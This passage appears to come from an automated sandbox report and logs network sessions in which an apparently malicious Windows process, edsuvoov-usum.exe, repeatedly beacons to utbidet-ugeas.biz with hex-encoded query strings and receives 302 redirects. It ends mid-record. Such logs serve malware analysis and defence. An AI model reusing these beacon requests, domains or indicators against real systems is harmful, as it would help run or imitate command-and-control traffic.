                                                                                                                                                                                                            129192.168.2.361504172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:09.856163979 CEST201OUTGET /d/N?023563DBDB3263DBDB0763F3DB35635508A15B738134631B733760EDF5074DE2E90553F5DB HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:10.350342035 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:10 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?023563DBDB3263DBDB0763F3DB35635508A15B738134631B733760EDF5074DE2E90553F5DB
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            130192.168.2.361506172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:11.116689920 CEST169OUTGET /d/N?02AA0963E6AD0963E698094BE6AA09ED353E31CBBCAB09A34EA80A55C898275AD49A394DE6 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:11.598535061 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02AA0963E6AD0963E698094BE6AA09ED353E31CBBCAB09A34EA80A55C898275AD49A394DE6
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            131192.168.2.361507172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:11.626349926 CEST201OUTGET /d/N?02AA0963E6AD0963E698094BE6AA09ED353E31CBBCAB09A34EA80A55C898275AD49A394DE6 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:12.123244047 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02AA0963E6AD0963E698094BE6AA09ED353E31CBBCAB09A34EA80A55C898275AD49A394DE6
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            132192.168.2.361509172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:13.004276991 CEST169OUTGET /d/N?022E17715D2917715D1C17595D2E17FF8EBA2FD9072F17B1F52C1447731C39486F1E275F5D HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:13.500818014 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:13 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?022E17715D2917715D1C17595D2E17FF8EBA2FD9072F17B1F52C1447731C39486F1E275F5D
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            133192.168.2.361510172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:13.510247946 CEST201OUTGET /d/N?022E17715D2917715D1C17595D2E17FF8EBA2FD9072F17B1F52C1447731C39486F1E275F5D HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:14.014981985 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:13 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?022E17715D2917715D1C17595D2E17FF8EBA2FD9072F17B1F52C1447731C39486F1E275F5D
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            134192.168.2.361512172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:14.938307047 CEST169OUTGET /d/N?027A06F3CB7D06F3CB4806DBCB7A067D18EE3E5B917B0633637805C5E54828CAF94A36DDCB HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:15.422403097 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:15 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?027A06F3CB7D06F3CB4806DBCB7A067D18EE3E5B917B0633637805C5E54828CAF94A36DDCB
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            135192.168.2.361513172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:15.456192970 CEST201OUTGET /d/N?027A06F3CB7D06F3CB4806DBCB7A067D18EE3E5B917B0633637805C5E54828CAF94A36DDCB HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:15.961560965 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:15 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?027A06F3CB7D06F3CB4806DBCB7A067D18EE3E5B917B0633637805C5E54828CAF94A36DDCB
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            136192.168.2.361515172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:19.900356054 CEST169OUTGET /d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E1655456FF7266 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:20.403390884 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:20 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E1655456FF7266
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            137192.168.2.361516172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:20.424276114 CEST201OUTGET /d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E1655456FF7266 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:20.931518078 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:20 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E1655456FF7266
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            138192.168.2.361518172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:21.632625103 CEST169OUTGET /d/N?0292F796E195F796E1A0F7BEE192F7183206CF3EBB93F7564990F4A0CFA0D9AFD3A2C7B8E1 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:22.261085987 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:22 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0292F796E195F796E1A0F7BEE192F7183206CF3EBB93F7564990F4A0CFA0D9AFD3A2C7B8E1
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            139192.168.2.361519172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:22.319037914 CEST201OUTGET /d/N?0292F796E195F796E1A0F7BEE192F7183206CF3EBB93F7564990F4A0CFA0D9AFD3A2C7B8E1 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:22.805072069 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:22 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0292F796E195F796E1A0F7BEE192F7183206CF3EBB93F7564990F4A0CFA0D9AFD3A2C7B8E1
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            140192.168.2.361521172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:22.960393906 CEST169OUTGET /d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B86858828A HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:23.452869892 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:23 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B86858828A
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            141192.168.2.361522172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:23.458837986 CEST201OUTGET /d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B86858828A HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:24.073371887 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:23 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B86858828A
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            142192.168.2.361524172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
